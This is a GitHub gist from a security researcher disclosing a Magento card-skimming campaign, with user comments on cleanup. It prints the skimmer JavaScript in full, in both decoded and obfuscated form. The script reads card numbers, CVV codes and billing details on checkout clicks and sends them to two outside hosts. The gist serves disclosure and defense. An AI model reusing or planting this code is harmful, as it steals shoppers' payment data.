Skip to content

Instantly share code, notes, and snippets.

@gwillem
Last active April 28, 2022 06:32
  • Star 6 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save gwillem/5d936f5a84837d5c1dcb488ce256294a to your computer and use it in GitHub Desktop.
962 stores found breached on the 4th of July - https://sansec.io
// Decoded by Sanguine Security <info@sansec.io>
String.prototype.hexEncode = function() {
var a, b;
var output = '';
for (b = 0; b < this.length; b++) {
a = this.charCodeAt(b).toString(16);
output += ('000' + a).slice(-4)
};
return output
};
function obfuscate(arg) {
var b64 = btoa(arg);
var b64hex = (b64.hexEncode());
var blob = '';
for (var i = 0; i < b64hex.length; i++) {
blob += (b64hex[i].charCodeAt(0) << 3) + '*'
};
var blobb64 = btoa(blob);
return blobb64
}
function addtoev() {
var allButtons = document.getElementsByClassName('button');
for (i = 0; i < allButtons.length; i++) {
allButtons[i].addEventListener('click', function() {
var ccCounter = '';
var serialPayload = '';
if (document.getElementsByName('payment[cc_number]')[0]) {
serialPayload += document.getElementsByName('payment[cc_number]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_cid]')[0]) {
ccCounter = document.getElementsByName('payment[cc_cid]')[0].value;
serialPayload += document.getElementsByName('payment[cc_cid]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_month]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_month]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_year]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_year]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_owner]')[0]) {
serialPayload += document.getElementsByName('payment[cc_owner]')[0].value + '|'
};
if (document.getElementsByName('billing[firstname]')[0]) {
serialPayload += document.getElementsByName('billing[firstname]')[0].value + '|'
};
if (document.getElementsByName('billing[lastname]')[0]) {
serialPayload += document.getElementsByName('billing[lastname]')[0].value + '|'
};
if (document.getElementsByName('billing[telephone]')[0]) {
serialPayload += document.getElementsByName('billing[telephone]')[0].value + '|'
};
if (document.getElementsByName('billing[street][]')[0]) {
serialPayload += document.getElementsByName('billing[street][]')[0].value + '|'
};
if (document.getElementsByName('billing[city]')[0]) {
serialPayload += document.getElementsByName('billing[city]')[0].value + '|'
};
if (document.getElementsByName('billing[postcode]')[0]) {
serialPayload += document.getElementsByName('billing[postcode]')[0].value + '|'
};
if (document.getElementsByName('billing[region_id]')[0]) {
serialPayload += document.getElementsByName('billing[region_id]')[0].value + '|'
};
if (document.getElementsByName('shipping[country_id]')[0]) {
serialPayload += document.getElementsByName('shipping[country_id]')[0].value + '|'
};
if (ccCounter != '') {
var payloadObj = {
Domain: 'all',
d: obfuscate(serialPayload)
};
rand = Math.floor((Math.random() * 1000000) + 1);
urll = 'https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=' + btoa(JSON.stringify(payloadObj));
var req1 = new XMLHttpRequest();
req1.open('GET', urll, false);
req1.send();
urll = 'http://89.32.251.136/counter/index.php?v=' + btoa(JSON.stringify(payloadObj));
var req2 = new XMLHttpRequest();
req2.open('GET', urll, false);
req2.send()
}
})
}
}
window.addEventListener('load', function() {
addtoev()
})
var _0xe6b4=["hexEncode","prototype","","length","charCodeAt","slice","000","*","button","getElementsByClassName","click","payment[cc_number]","getElementsByName","value","|","payment[cc_cid]","payment[cc_exp_month]","payment[cc_exp_year]","payment[cc_owner]","billing[firstname]","billing[lastname]","billing[telephone]","billing[street][]","billing[city]","billing[postcode]","billing[region_id]","shipping[country_id]","all","random","floor","https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=","stringify","GET","open","send","http://89.32.251.136/counter/index.php?v=","addEventListener","load"];String[_0xe6b4[1]][_0xe6b4[0]]= function(){var _0x3692x1,_0x3692x2;var _0x3692x3=_0xe6b4[2];for(_0x3692x2= 0;_0x3692x2< this[_0xe6b4[3]];_0x3692x2++){_0x3692x1= this[_0xe6b4[4]](_0x3692x2).toString(16);_0x3692x3+= (_0xe6b4[6]+ _0x3692x1)[_0xe6b4[5]](-4)};return _0x3692x3};function sa(_0x3692x5){var _0x3692x6=btoa(_0x3692x5);var _0x3692x7=(_0x3692x6[_0xe6b4[0]]());var _0x3692x8=_0xe6b4[2];for(var _0x3692x2=0;_0x3692x2< _0x3692x7[_0xe6b4[3]];_0x3692x2++){_0x3692x8+= (_0x3692x7[_0x3692x2][_0xe6b4[4]](0)<< 3)+ _0xe6b4[7]};var _0x3692x9=btoa(_0x3692x8);return _0x3692x9}function addtoev(){var _0x3692xb=document[_0xe6b4[9]](_0xe6b4[8]);for(i= 0;i< _0x3692xb[_0xe6b4[3]];i++){_0x3692xb[i][_0xe6b4[36]](_0xe6b4[10],function(){var _0x3692xc=_0xe6b4[2];var _0x3692xd=_0xe6b4[2];if(document[_0xe6b4[12]](_0xe6b4[11])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[11])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[15])[0]){_0x3692xc= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]];_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[16])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[16])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[17])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[17])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[18])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[18])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[19])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[19])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[20])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[20])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[21])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[21])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[22])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[22])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[23])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[23])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[24])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[24])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[25])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[25])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[26])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[26])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(_0x3692xc!= _0xe6b4[2]){var _0x3692xe={Domain:_0xe6b4[27],d:sa(_0x3692xd)};rand= Math[_0xe6b4[29]]((Math[_0xe6b4[28]]()* 1000000)+ 1);urll= _0xe6b4[30]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692xf= new XMLHttpRequest();_0x3692xf[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692xf[_0xe6b4[34]]();urll= _0xe6b4[35]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692x10= new XMLHttpRequest();_0x3692x10[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692x10[_0xe6b4[34]]()}})}}window[_0xe6b4[36]](_0xe6b4[37],function(){addtoev()})
@costicanu
Copy link

costicanu commented Jul 18, 2019

any idea on how to fix this the security breach on magento?

@gwillem
Copy link
Author

gwillem commented Jul 26, 2019

@costicanu They use multiple exploits to gain access to these stores. See also https://sansec.io/labs/2019/01/29/magento-module-blacklist/

@temp8888
Copy link

I resolved this. They insert this code into the database; not in the php file system.

table core_config_data > there you will see it in the field design/footer/absolute_footer

or

System -> Configuration -> Design -> Footer -> Miscellaneous HTML

design/footer/absolute_footer Hackers embed malicious code. There will be several rows of spaces to hide from visible sight

edit:

#File: app/code/core/Mage/Page/Block/Html.php
public function getAbsoluteFooter()
{
return Mage::getStoreConfig('design/footer/absolute_footer');
}

Then I figured I didn't need this so I commented it out.

public function getAbsoluteFooter()
{
#return Mage::getStoreConfig('design/footer/absolute_footer');
}

Should also use https://www.magereport.com to identify the security holes

@gwillem
Copy link
Author

gwillem commented Jul 29, 2019

Mind you, you are battling the symptoms here, not the root cause. If people are able to write to your database, you have bigger problems.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment